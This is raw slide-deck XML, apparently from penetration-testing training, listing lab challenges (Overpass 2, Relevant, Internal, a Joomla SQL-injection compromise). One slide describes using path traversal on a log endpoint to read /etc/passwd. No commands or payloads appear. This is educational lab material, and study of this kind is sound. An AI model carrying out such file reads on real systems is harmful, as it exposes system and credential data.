                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Compromising a Joomla CMS via SQL injection, cracking hashes, and escalating privileges.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583"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4881" y="662980"/>
            <a:ext cx="6294239" cy="1183680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4625"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3708" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Overpass 2 and Penetration Testing Challenges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3708" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234881" y="2343746"/>
            <a:ext cx="426144" cy="426144"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18668"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="182567"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="313E80"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5367139" y="2414786"/>
            <a:ext cx="161528" cy="284063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2208"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2208" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850334" y="2343745"/>
            <a:ext cx="2367558" cy="295870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1833" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Overpass 2 - Hacked</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1833" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850334" y="2753221"/>
            <a:ext cx="5678785" cy="606028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2375"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1458" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Analyzing attacker actions and performing a counter-hack on a compromised system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1458" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234881" y="3761582"/>
            <a:ext cx="426144" cy="426144"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18668"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="182567"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="313E80"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5367139" y="3832622"/>
            <a:ext cx="161528" cy="284063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2208"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2208" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850334" y="3761582"/>
            <a:ext cx="2367558" cy="295870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1833" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Relevant</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1833" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850334" y="4171057"/>
            <a:ext cx="5678785" cy="606028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2375"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1458" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A comprehensive penetration testing challenge to apply all learned skills.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1458" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234881" y="5179418"/>
            <a:ext cx="426144" cy="426144"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18668"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="182567"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="313E80"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5367139" y="5250458"/>
            <a:ext cx="161528" cy="284063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2208"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2208" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850334" y="5179418"/>
            <a:ext cx="2367558" cy="295870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1833" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Internal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1833" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850334" y="5588894"/>
            <a:ext cx="5678785" cy="606028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2375"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1458" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Advanced penetration testing scenario simulating real-world corporate environments.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1458"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7B6288-939E-EF96-DB09-55B99ECD23EB}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 4" descr="A screenshot of a computer program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B47487C-788A-AE11-6584-CCA540C093AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="3534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5623972-A5C7-856D-18E9-88B72B43BD3C}"/>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chemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>INSTANT Machine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18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E880C650-2338-222F-6E2C-8DACA869D499}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="3998018"/>
            <a:ext cx="3981854" cy="2216513"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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FCABFF5-EC04-60B1-45BB-8F25B4234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4" y="1631316"/>
            <a:ext cx="10872172" cy="148925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7C386F8C-6FB1-9ACF-6BBB-484AAEB4A725}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4970835" y="3998019"/>
            <a:ext cx="6382966" cy="2216512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I tried the important endpoints that gave me information which are list users endpoint that give me all the users in the application and the view logs endpoint which give me all the file logs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40110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FFA6B8-7BE3-5753-4D72-4864779CCD5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931C30-60BE-9E3D-9420-7DF063CCA49C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008184" y="174032"/>
            <a:ext cx="10175631" cy="1111843"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC4745B-CE6F-8742-AF42-FABA02EC12D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008184" y="1459907"/>
            <a:ext cx="10175630" cy="1111842"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In the endpoint that give me the logs, it accepts a path to the log file, so I tried path traversal technique and it worked and I was able to get the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/passwd file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screen shot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2C0CFB9-A420-8CE5-29F3-9364B1C78F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3132407"/>
            <a:ext cx="10515595" cy="2444876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207744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C0CCF94-9536-4A63-8FF2-E37827C92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970655A-F4C2-4D7E-BAB6-D3BFC5CAE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8174"/>
            <a:ext cx="12192000" cy="4939827"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>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499101 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 232983 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 4680829 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 287953 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 136361 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX161" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY161" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX162" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY162" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX163" fmla="*/ 5887271 w 12192000"/>
              <a:gd name="connsiteY163" fmla="*/ 176084 h 4939827"/>
              <a:gd name="connsiteX164" fmla="*/ 5916552 w 12192000"/>
              <a:gd name="connsiteY164" fmla="*/ 189955 h 4939827"/>
              <a:gd name="connsiteX165" fmla="*/ 5983240 w 12192000"/>
              <a:gd name="connsiteY165" fmla="*/ 152755 h 4939827"/>
              <a:gd name="connsiteX166" fmla="*/ 6061852 w 12192000"/>
              <a:gd name="connsiteY166" fmla="*/ 161953 h 4939827"/>
              <a:gd name="connsiteX167" fmla="*/ 6408386 w 12192000"/>
              <a:gd name="connsiteY167" fmla="*/ 157590 h 4939827"/>
              <a:gd name="connsiteX168" fmla="*/ 6531386 w 12192000"/>
              <a:gd name="connsiteY168" fmla="*/ 156103 h 4939827"/>
              <a:gd name="connsiteX169" fmla="*/ 6721509 w 12192000"/>
              <a:gd name="connsiteY169" fmla="*/ 54829 h 4939827"/>
              <a:gd name="connsiteX170" fmla="*/ 6947884 w 12192000"/>
              <a:gd name="connsiteY170" fmla="*/ 47587 h 4939827"/>
              <a:gd name="connsiteX171" fmla="*/ 6965101 w 12192000"/>
              <a:gd name="connsiteY171" fmla="*/ 25718 h 4939827"/>
              <a:gd name="connsiteX172" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY172" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX173" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY173" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX174" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY174" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX175" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY175" fmla="*/ 1651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435843 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 234325 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 4680829 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 287953 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 136361 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 176781 h 4939827"/>
